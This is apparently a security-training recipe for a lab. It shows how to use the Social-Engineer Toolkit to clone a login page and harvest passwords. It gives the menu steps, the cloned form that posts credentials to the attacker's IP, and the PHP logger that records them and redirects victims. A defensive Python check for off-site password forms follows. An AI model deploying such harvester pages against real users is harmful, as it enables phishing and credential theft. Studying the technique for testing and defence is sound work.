Social engineering attacks may be considered a special kind of client-side attack. In such attacks, the attacker has to convince the user that the attacker is a trustworthy counterpart and is authorized to receive the information the user has.
SET, or the Social-Engineer Toolkit (https://www.trustedsec.com/social-engineer-toolkit/), is a set of tools designed to perform attacks against the human element, such as spear-phishing, mass e-mails, SMS, rogue wireless access points, malicious websites, infected media, and so on.
In this recipe, we will use SET to create a password harvester web page and look at how it works and how attackers use it to steal a user's passwords.
1. setoolkit
2. In the set> prompt, write 1 (for Social-Engineering Attacks) and hit Enter.
3. Select Website Attack Vectors (option 2).
4. Select Credential Harvester Attack Method (option 3).
5. Select Site Cloner (option 2).
6. IP address for the POST back in Harvester/Tabnabbing, which means the IP where the harvested credentials are going to be sent to. Here, we write the IP of our Kali machine in the host only network (vboxnet0): 192.168.56.1.
7. Enter the URL to clone: http://192.168.56.102/peruggia/index.php?action=login.
8. Write y and hit Enter.
9. Go to http://192.168.56.1/. Now we have an exact copy of the original login.
10. harvester/test.
11. /var/www/html in your Kali Linux:
    cd /var/www/html
12. harvester_{date and time}.txt
13. cat "harvester_2015-11-22 23:16:24.182192.txt"
And that's it; we just need to send a link to our target users for them to visit our fake login to harvest their passwords.
SET creates three files when it clones a site; first, an index.html, which is the copy of the original page and contains the login form. If we look at the code of the index.html file that SET created in /var/www/html in our Kali machine, we will find the following code:
<form action="http://192.168.56.1/post.php" method=post>
<br>
Username: <input type=text name=username><br>
Password: <input type=password name=password><br>
<br><input type=submit value=Login><br>
</form>
Here, we can see that, when submitted, the username and password will be sent to post.php on 192.168.56.1 (our Kali machine); this is the second file that SET creates. All this file does is read the contents of the POST request and write them into a harvester_{date and time}.txt file, the third file created by SET and the one that will store the information submitted by users. After writing the data to the file, the <meta> tag redirects to the original login page, so the user will think that they typed their username or password incorrectly:
<?php
$file = 'harvester_2015-11-22 23:16:24.182192.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
<meta http-equiv="refresh" content="0; url=http://192.168.56.102/peruggia/index.php?action=login" />
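The cloned form above differs from the original in one observable way: its password field posts to a host other than the real site. The following Python check for that signal is an added example, not code from the recipe or from SET; the function and class names are hypothetical, and the ORIGINAL sample's relative action is an assumption about the real Peruggia page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

LEGIT_HOSTS = {"192.168.56.102"}  # host of the real login page in this recipe
# Constructed samples: the cloned form shown above, and an assumed original
# whose relative action is a guess at what the real Peruggia page uses.
CLONE = ('<form action="http://192.168.56.1/post.php" method=post>'
         'Username: <input type=text name=username>'
         'Password: <input type=password name=password>'
         '<input type=submit value=Login></form>')
ORIGINAL = CLONE.replace("http://192.168.56.1/post.php",
                         "index.php?action=login&check=1")


class FormCollector(HTMLParser):
    """Record each form's action and whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def offsite_password_forms(html, page_url, legit_hosts=LEGIT_HOSTS):
    """Return resolved action URLs of password forms that post to another host."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if form["password"]:
            target = urljoin(page_url, form["action"])  # empty action = page itself
            if (urlsplit(target).hostname or "").lower() not in legit_hosts:
                findings.append(target)
    return findings


if __name__ == "__main__":
    print(offsite_password_forms(CLONE, "http://192.168.56.1/"))
```

A relative or empty action resolves against the URL the page was fetched from, so the same check also flags a clone whose form posts back to its own host.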